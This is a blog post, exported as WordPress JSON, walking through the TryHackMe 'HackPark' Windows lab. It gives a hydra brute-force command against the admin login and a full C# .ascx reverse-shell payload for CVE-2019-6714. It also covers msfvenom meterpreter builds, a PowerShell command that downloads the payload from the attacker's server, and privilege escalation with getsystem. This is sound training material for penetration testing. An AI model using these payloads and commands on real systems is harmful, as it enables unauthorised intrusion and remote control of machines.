{"id":131281,"date":"2023-01-18T13:52:48","date_gmt":"2023-01-18T13:52:48","guid":{"rendered":"https:\/\/blog.finxter.com\/?p=1068923"},"modified":"2023-01-18T13:52:48","modified_gmt":"2023-01-18T13:52:48","slug":"how-i-solved-the-hackpark-walkthrough-tryhackme","status":"publish","type":"post","link":"https:\/\/sickgaming.net\/blog\/2023\/01\/18\/how-i-solved-the-hackpark-walkthrough-tryhackme\/","title":{"rendered":"How I Solved the Hackpark Walkthrough (TryHackMe)"},"content":{"rendered":"\n<figure class=\"wp-block-embed-youtube wp-block-embed is-type-video is-provider-youtube\"><a href=\"https:\/\/blog.finxter.com\/hackpark-walkthrough-tryhackme\/\"><img decoding=\"async\" src=\"https:\/\/blog.finxter.com\/wp-content\/plugins\/wp-youtube-lyte\/lyteCache.php?origThumbUrl=https%3A%2F%2Fi.ytimg.com%2Fvi%2FzSsY4-Qr5b8%2Fhqdefault.jpg\" alt=\"YouTube Video\"><\/a><figcaption><\/figcaption><\/figure>\n<h2>CHALLENGE OVERVIEW<\/h2>\n<ul>\n<li><strong>Link<\/strong>: <a href=\"https:\/\/tryhackme.com\/room\/hackpark\" target=\"_blank\" rel=\"noreferrer noopener\">hackpark<\/a><\/li>\n<li><strong>Difficulty<\/strong>: Medium<\/li>\n<li><strong>Target<\/strong>: <code>user<\/code> and <code>root<\/code> flags on a windows machine<\/li>\n<li><strong>Highlight<\/strong>: using <code>metasploit<\/code> to quickly and easily gain root access\u00a0<\/li>\n<li><strong>Tools<\/strong>: 
<code>nmap<\/code>, <code>dirb<\/code>, <code>hydra<\/code>, <code>burpsuite<\/code>, <code>msfvenom<\/code><\/li>\n<li><strong>Tags<\/strong>: RCE (remote code execution), Windows<\/li>\n<\/ul>\n<h2>BACKGROUND<\/h2>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"718\" height=\"893\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-189.png\" alt=\"\" class=\"wp-image-1068966\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-189.png 718w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-189-241x300.png 241w\" sizes=\"auto, (max-width: 718px) 100vw, 718px\" \/><\/figure>\n<\/div>\n<p>In this box, we will hack into a windows machine using standard pen-testing tools. There are two options for solving the box. <\/p>\n<p>I\u2019ll demonstrate in this post how to hack into the box with <code>metasploit<\/code>. In the upcoming Hackpark Part II post, I\u2019ll show how to find the flags without using <code>metasploit<\/code>.<\/p>\n<h2>ATTACK MAP<\/h2>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img decoding=\"async\" loading=\"lazy\" width=\"1024\" height=\"521\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-182-1024x521.png\" alt=\"\" class=\"wp-image-1068933\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-182-1024x521.png 1024w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-182-300x153.png 300w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-182-768x391.png 768w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-182.png 1189w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/div>\n<p>IPs<\/p>\n<p>First, let\u2019s record our IP addresses in export format to use as bash variables.<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" 
data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">export myIP=10.6.2.23\nexport targetIP=10.10.72.99<\/pre>\n<h2>ENUMERATION<\/h2>\n<p>We\u2019ll kick things off with a <code>dirb<\/code> scan and an <code>nmap<\/code> scan. The <code>dirb<\/code> scan discovers an <code>\/admin<\/code> directory on the target, and the <code>nmap<\/code> scan shows two open ports:<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">\u250c\u2500[kalisurfer@parrot]\u2500[~]\n\u2514\u2500\u2500\u257c $nmap 10.10.208.243\nStarting Nmap 7.92 ( https:\/\/nmap.org ) at 2023-01-08 16:03 EST\nNmap scan report for 10.10.208.243\nHost is up (0.098s latency).\nNot shown: 998 filtered tcp ports (no-response)\nPORT STATE SERVICE\n80\/tcp open http\n3389\/tcp open ms-wbt-server\n<\/pre>\n<p>The <code>ms-wbt-server<\/code> service on port 3389 looks interesting. A quick Google search shows that this port is used for Windows Remote Desktop (RDP). 
We may come back to this later on in the hack.<\/p>\n<h2>PREPPING OUR COMMAND FOR HYDRA<\/h2>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img decoding=\"async\" loading=\"lazy\" width=\"1024\" height=\"683\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-190-1024x683.png\" alt=\"\" class=\"wp-image-1068968\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-190-1024x683.png 1024w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-190-300x200.png 300w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-190-768x512.png 768w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-190.png 1110w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/div>\n<p>Next, we\u2019ll use Firefox\u2019s developer tools to inspect the POST request that is sent when we attempt to log in to the <code>\/admin<\/code> portal with generic credentials (<code>admin:pass<\/code>). The captured form body carries the ASP.NET <code>__VIEWSTATE<\/code> and <code>__EVENTVALIDATION<\/code> fields alongside the username and password fields, and hydra will need to replay all of them:<\/p>\n<pre class=\"wp-block-preformatted\"><code>__VIEWSTATE=Ik8Nvzb7OPvdGbKFiQG65vUd0%2BKTMDTlsuaJHFI0n8AGY6ejY97f8BtzIPa7NQD6ojY6%2BrSLbrLQTpGUW7PNN9yu81%2BCr%2BzyoGnG5t7h21SlApufYlxqpTftAU7kTGIVDHtrw%2FHc%2FbHRLj78Vg3uIgS1tBETE8yA%2FyhVkcxlv4S57ylx&amp;__EVENTVALIDATION=KzdpR5ig%2BeM9w8w06SCMiInTpqbnYjXVG%2BDsvem6bDW%2FszuOrIZ3bwrEZB4Ps4uxbPdetrkQk72MA02Zly2E8U%2FYGMss7sshnGSsNoB6bxRQVsMu7PvPvPWKMYgqIU4DNXIVP75lYFa9ROEIMvKVip1Q%2F0ofNG0%2FXAWpg3L4ag2J%2FxFs&amp;ctl00%24MainContent%24LoginUser%24UserName=user&amp;ctl00%24MainContent%24LoginUser%24Password=pass&amp;ctl00%24MainContent%24LoginUser%24LoginButton=Log+in<\/code>\n<\/pre>\n<p>Next, we\u2019ll prepare the hydra command that brute-forces the admin portal login.<\/p>\n<pre class=\"wp-block-preformatted\"><code>hydra -l admin -P \/home\/kalisurfer\/hacking-tools\/rockyou.txt 10.10.72.99 http-post-form \"\/Account\/login.aspx?ReturnURL=%2fadmin:__VIEWSTATE=AQWOT7qT89VUF9tqt9CcJxYj9HZaL2gEIdS%2F7EX6bVPPKSW75bNJUrkMtH5N7ca98BgUSI9lNnsYcwm3aaM37KLFLBXXfrIJxCZma36IBRRCWTCZe%2BXoBJOFbJnGnQrGbrZEr6acimyj5ZwEGf0OAuAfc1xWkJ0%2BrszOq1MNzhtok7qDPJ%2FZf5IAVBD%2Fmt6iBA4TSBv7cqegT%2FppXiEqxwlcrI7XTwCbqAKYhdIDyM1QMY5TTAMFdbntYPdEDoR3x2ZK1mmM3TAS03J1Y4d%2BkOZWGvuEzbpD2FK8oRD7V9FxyizlIyxKK6egJMLHkF8wLekBf2kxBLX0l64Dbb68YbWyGVmNi6bt%2BqH02JOxtv6pPXlY&amp;__EVENTVALIDATION=E2cc8lwr7Dt6tUQcOjjl5fktG5y5DFErZ%2F%2FA5fVpnOdEG3r6M5vBCXiCPZMX9Z%2F%2B3sFhi58t3fO73JqPN4XtBRJLOgWcMqZRv1vvAb7Up1ElProlDH2kPYAUjONCs76hrlMAsAdWSPId8TAgEByU6Ag3pmhDpmlWP6cNFkjswMWLxUIz&amp;ctl00%24MainContent%24LoginUser%24UserName=admin&amp;ctl00%24MainContent%24LoginUser%24Password=^PASS^&amp;ctl00%24MainContent%24LoginUser%24LoginButton=Log+in:Login failed\"<\/code><\/pre>\n<ul>\n<li><code>-l<\/code> specifies a single username (<code>admin<\/code>)<\/li>\n<li><code>-P<\/code> specifies the password wordlist<\/li>\n<li><code>http-post-form<\/code> selects hydra\u2019s HTTP POST form module; its quoted argument has the form <code>path:POST body:failure string<\/code>, and hydra substitutes each candidate password for <code>^PASS^<\/code><\/li>\n<li><code>:Login failed<\/code> (at the end of the command) is the text in the response that marks a failed login attempt, so any response that does not contain it is reported as a valid password<\/li>\n<\/ul>\n<p>Results:<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">Hydra v9.1 (c) 2020 by van Hauser\/THC &amp; David Maciejak - Please do not use in military or secret service organizations, or for 
illegal purposes (this is non-binding, these *** ignore laws and ethics anyway). Hydra (https:\/\/github.com\/vanhauser-thc\/thc-hydra) starting at 2023-01-08 18:02:09\n[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344398 login tries (l:1\/p:14344398), ~896525 tries per task\n[DATA] attacking http-post-form:\/\/10.10.208.243:80\/Account\/login.aspx?ReturnURL=%2fadmin:__VIEWSTATE=AQWOT7qT89VUF9tqt9CcJxYj9HZaL2gEIdS%2F7EX6bVPPKSW75bNJUrkMtH5N7ca98BgUSI9lNnsYcwm3aaM37KLFLBXXfrIJxCZma36IBRRCWTCZe%2BXoBJOFbJnGnQrGbrZEr6acimyj5ZwEGf0OAuAfc1xWkJ0%2BrszOq1MNzhtok7qDPJ%2FZf5IAVBD%2Fmt6iBA4TSBv7cqegT%2FppXiEqxwlcrI7XTwCbqAKYhdIDyM1QMY5TTAMFdbntYPdEDoR3x2ZK1mmM3TAS03J1Y4d%2BkOZWGvuEzbpD2FK8oRD7V9FxyizlIyxKK6egJMLHkF8wLekBf2kxBLX0l64Dbb68YbWyGVmNi6bt%2BqH02JOxtv6pPXlY&amp;__EVENTVALIDATION=E2cc8lwr7Dt6tUQcOjjl5fktG5y5DFErZ%2F%2FA5fVpnOdEG3r6M5vBCXiCPZMX9Z%2F%2B3sFhi58t3fO73JqPN4XtBRJLOgWcMqZRv1vvAb7Up1ElProlDH2kPYAUjONCs76hrlMAsAdWSPId8TAgEByU6Ag3pmhDpmlWP6cNFkjswMWLxUIz&amp;ctl00%24MainContent%24LoginUser%24UserName=admin&amp;ctl00%24MainContent%24LoginUser%24Password=^PASS^&amp;ctl00%24MainContent%24LoginUser%24LoginButton=Log+in:Login failed\n[STATUS] 663.00 tries\/min, 663 tries in 00:01h, 14343735 to do in 360:35h, 16 active\n[80][http-post-form] host: 10.10.208.243 login: admin password: 1qaz2wsx\n1 of 1 target successfully completed, 1 valid password found\nHydra (https:\/\/github.com\/vanhauser-thc\/thc-hydra) finished at 2023-01-08 18:03:43\n<\/pre>\n<h2>INITIAL FOOTHOLD<\/h2>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img decoding=\"async\" loading=\"lazy\" width=\"1024\" height=\"503\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-191-1024x503.png\" alt=\"\" class=\"wp-image-1068969\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-191-1024x503.png 1024w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-191-300x147.png 300w, 
https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-191-768x377.png 768w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-191.png 1110w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/div>\n<p>Now we can log in with the <code>user:password<\/code> combo <code>admin:1qaz2wsx<\/code>.<\/p>\n<p>We are shown an admin dashboard for BlogEngine.NET. Searching for <code>blogengine<\/code> on <em>exploit-db.com<\/em> reveals a possible exploit for us to use (<a rel=\"noreferrer noopener\" href=\"https:\/\/www.exploit-db.com\/exploits\/46353\" target=\"_blank\">CVE-2019-6714<\/a>): a path traversal in the <code>theme<\/code> parameter that makes the server load an uploaded <code>.ascx<\/code> control as server-side code. <\/p>\n<p>To use the exploit, we need to upload the exploit\u2019s payload (<code>PostView.ascx<\/code>) through the file manager. We can then trigger it by accessing the following address in our browser, which points the <code>theme<\/code> parameter at the upload directory: <\/p>\n<p><em>http:\/\/10.10.172.59\/?theme=..\/..\/App_Data\/files<\/em><\/p>\n<p>And we should then be able to catch the <a href=\"https:\/\/blog.finxter.com\/python-one-line-reverse-shell\/\" data-type=\"post\" data-id=\"11536\" target=\"_blank\" rel=\"noreferrer noopener\">revshell<\/a> with a <code>netcat<\/code> listener.<\/p>\n<h2>PREPARE THE PAYLOAD<\/h2>\n<p>We need to change the IP and port in the following payload (the <code>TcpClient(\"10.6.2.23\", 8888)<\/code> call: our attack machine\u2019s IP and the port our listener will use), and then save it as <code>PostView.ascx<\/code>.<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">payload:\n&lt;%@ Control Language=\"C#\" AutoEventWireup=\"true\" EnableViewState=\"false\" Inherits=\"BlogEngine.Core.Web.Controls.PostViewBase\" %>\n&lt;%@ Import Namespace=\"BlogEngine.Core\" %> &lt;script runat=\"server\"> static System.IO.StreamWriter streamWriter; protected override void OnLoad(EventArgs e) { base.OnLoad(e); using(System.Net.Sockets.TcpClient client = new System.Net.Sockets.TcpClient(\"10.6.2.23\", 8888)) { 
using(System.IO.Stream stream = client.GetStream()) { using(System.IO.StreamReader rdr = new System.IO.StreamReader(stream)) { streamWriter = new System.IO.StreamWriter(stream); StringBuilder strInput = new StringBuilder(); System.Diagnostics.Process p = new System.Diagnostics.Process(); p.StartInfo.FileName = \"cmd.exe\"; p.StartInfo.CreateNoWindow = true; p.StartInfo.UseShellExecute = false; p.StartInfo.RedirectStandardOutput = true; p.StartInfo.RedirectStandardInput = true; p.StartInfo.RedirectStandardError = true; p.OutputDataReceived += new System.Diagnostics.DataReceivedEventHandler(CmdOutputDataHandler); p.Start(); p.BeginOutputReadLine(); while(true) { strInput.Append(rdr.ReadLine()); p.StandardInput.WriteLine(strInput); strInput.Remove(0, strInput.Length); } } } } } private static void CmdOutputDataHandler(object sendingProcess, System.Diagnostics.DataReceivedEventArgs outLine) { StringBuilder strOutput = new StringBuilder(); if (!String.IsNullOrEmpty(outLine.Data)) { try { strOutput.Append(outLine.Data); streamWriter.WriteLine(strOutput); streamWriter.Flush(); } catch (Exception err) { } } } &lt;\/script>\n&lt;asp:PlaceHolder ID=\"phContent\" runat=\"server\" EnableViewState=\"false\">&lt;\/asp:PlaceHolder>\n<\/pre>\n<h2>SET UP THE NC LISTENER<\/h2>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"715\" height=\"894\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-192.png\" alt=\"\" class=\"wp-image-1068971\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-192.png 715w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-192-240x300.png 240w\" sizes=\"auto, (max-width: 715px) 100vw, 715px\" \/><\/figure>\n<\/div>\n<p>Next, let\u2019s spin up a <code>netcat<\/code> listener with the command:<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" 
data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">nc -lnvp 8888<\/pre>\n<h2>TRIGGER THE REV SHELL<\/h2>\n<p>Now that our malicious payload is uploaded and our <code>netcat<\/code> listener is activated, all we have to do is navigate to the following address, and we should catch the reverse shell as planned.\u00a0<\/p>\n<p><em>http:\/\/10.10.172.59\/?theme=..\/..\/App_Data\/files<\/em><\/p>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"397\" height=\"230\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-183.png\" alt=\"\" class=\"wp-image-1068942\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-183.png 397w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-183-300x174.png 300w\" sizes=\"auto, (max-width: 397px) 100vw, 397px\" \/><\/figure>\n<\/div>\n<p>And \u2026 bingo! We\u2019ve caught the revshell and we are in with our initial foothold!<\/p>\n<h2>UPGRADE THE SHELL TO METERPRETER<\/h2>\n<p>Now that we are in the shell, we can work to upgrade our shell to a meterpreter shell. This will allow us to use many powerful tools within metasploit framework. 
<\/p>\n<p>We\u2019ll use <code>python3<\/code> to spin up a <a href=\"https:\/\/blog.finxter.com\/python-one-liner-webserver\/\" data-type=\"post\" data-id=\"8635\" target=\"_blank\" rel=\"noreferrer noopener\">simple HTTP server<\/a> that serves the reverse meterpreter shell payload file to the Windows machine.<\/p>\n<h2>USE MSFVENOM TO CREATE REVSHELL PAYLOAD<\/h2>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img decoding=\"async\" loading=\"lazy\" width=\"1024\" height=\"684\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-193-1024x684.png\" alt=\"\" class=\"wp-image-1068973\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-193-1024x684.png 1024w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-193-300x200.png 300w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-193-768x513.png 768w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-193.png 1110w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/div>\n<p>The following command will create the payload:<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">msfvenom -p windows\/meterpreter\/reverse_tcp LHOST=10.6.2.23 LPORT=8888 -f exe -o payload.exe<\/pre>\n<p>The payload did not work on my machine, so I added encoding using a standard encoder, the \u201cshikata ga nai\u201d.<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">msfvenom -p windows\/meterpreter\/reverse_tcp -a x86 --encoder x86\/shikata_ga_nai LHOST=10.6.2.23 LPORT=9999 -f exe -o 
payload.exe<\/pre>\n<h2>TRANSFER THE MSFVENOM PAYLOAD TO TARGET<\/h2>\n<p>Next, we\u2019ll transfer the encoded payload from our attack machine to the target machine.<\/p>\n<p>Let\u2019s navigate to the directory that holds the <code>payload.exe<\/code> on our attack machine. Then we\u2019ll spin up a simple HTTP server (listening on port 8000 by default) using the command:<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">python3 -m http.server<\/pre>\n<p>Then, from the reverse shell on the target, we\u2019ll download the file from our HTTP server onto the Windows machine:<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">powershell -c \"Invoke-WebRequest -Uri 'http:\/\/10.6.2.23:8000\/payload.exe' -OutFile 'C:\\Windows\\Temp\\winPEASx64.exe'\"<\/pre>\n<p>Notice that we save the file in the <code>Temp<\/code> directory because we have write permissions there. 
This is a common configuration that can be leveraged as an unprivileged user.<\/p>\n<h2>CATCH THE METERPRETER SHELL WITH METASPLOIT<\/h2>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img decoding=\"async\" loading=\"lazy\" width=\"1024\" height=\"683\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-194-1024x683.png\" alt=\"\" class=\"wp-image-1068975\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-194-1024x683.png 1024w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-194-300x200.png 300w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-194-768x512.png 768w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-194.png 1110w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/div>\n<p>First, let\u2019s fire up the Metasploit console:<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">msfconsole<\/pre>\n<p>Then load the handler:<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">use exploit\/multi\/handler<\/pre>\n<p>Next, we need to set <code>lhost<\/code> to our attack machine\u2019s IP and <code>lport<\/code> to the port we baked into the payload with <code>msfvenom<\/code> (9999 for the encoded build), and set the payload to <code>windows\/meterpreter\/reverse_tcp<\/code> so that it matches the one the executable was built with.<\/p>\n<p>Now that everything is set up correctly, we can run it to boot up the meterpreter listener:<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">run<\/pre>\n<p>Activate the uploaded executable (called <code>shell.exe<\/code> here; we saved ours as <code>winPEASx64.exe<\/code> above) on the 
target machine to throw a meterpreter revshell<\/p>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"943\" height=\"547\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-184.png\" alt=\"\" class=\"wp-image-1068944\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-184.png 943w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-184-300x174.png 300w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-184-768x445.png 768w\" sizes=\"auto, (max-width: 943px) 100vw, 943px\" \/><\/figure>\n<\/div>\n<p>And we got it! The lower left console window shows the meterpreter shell.<\/p>\n<p>Now that we are running a meterpreter shell in <code>msfconsole<\/code> we can quickly pwn the system with:<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">getsystem<\/pre>\n<p>And view the system information:<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">sysinfo<\/pre>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"533\" height=\"359\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-185.png\" alt=\"\" class=\"wp-image-1068945\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-185.png 533w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-185-300x202.png 300w\" sizes=\"auto, (max-width: 533px) 100vw, 533px\" \/><\/figure>\n<\/div>\n<p>We can view our user information with the command:<\/p>\n<pre class=\"EnlighterJSRAW\" 
data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">getuid<\/pre>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"468\" height=\"71\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-186.png\" alt=\"\" class=\"wp-image-1068947\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-186.png 468w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-186-300x46.png 300w\" sizes=\"auto, (max-width: 468px) 100vw, 468px\" \/><\/figure>\n<\/div>\n<p>Since we are already NT Authority, thanks to the magical powers of Metasploit, we don\u2019t need to do anything else except locate and retrieve the two flags.<\/p>\n<p>We found both flags!<\/p>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"518\" height=\"378\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-187.png\" alt=\"\" class=\"wp-image-1068948\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-187.png 518w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/01\/image-187-300x219.png 300w\" sizes=\"auto, (max-width: 518px) 100vw, 518px\" \/><\/figure>\n<\/div>\n<p>In the next post, I\u2019ll walk you through an alternate solution to this box without needing Metasploit.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>5\/5 &#8211; (1 vote) CHALLENGE OVERVIEW Link: hackpark Difficulty: Medium Target: user and root flags on a windows machine Highlight: using metasploit to quickly and easily gain root access\u00a0 Tools: nmap, dirb, hydra, burpsuite, msfvenom Tags: RCE (remote code execution), Windows BACKGROUND In this box, we will hack into a windows machine using standard pen-testing 
[&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[857],"tags":[73,468,528],"class_list":["post-131281","post","type-post","status-publish","format-standard","hentry","category-python-tut","tag-programming","tag-python","tag-tutorial"],"_links":{"self":[{"href":"https:\/\/sickgaming.net\/blog\/wp-json\/wp\/v2\/posts\/131281","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/sickgaming.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/sickgaming.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/sickgaming.net\/blog\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/sickgaming.net\/blog\/wp-json\/wp\/v2\/comments?post=131281"}],"version-history":[{"count":0,"href":"https:\/\/sickgaming.net\/blog\/wp-json\/wp\/v2\/posts\/131281\/revisions"}],"wp:attachment":[{"href":"https:\/\/sickgaming.net\/blog\/wp-json\/wp\/v2\/media?parent=131281"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/sickgaming.net\/blog\/wp-json\/wp\/v2\/categories?post=131281"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/sickgaming.net\/blog\/wp-json\/wp\/v2\/tags?post=131281"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}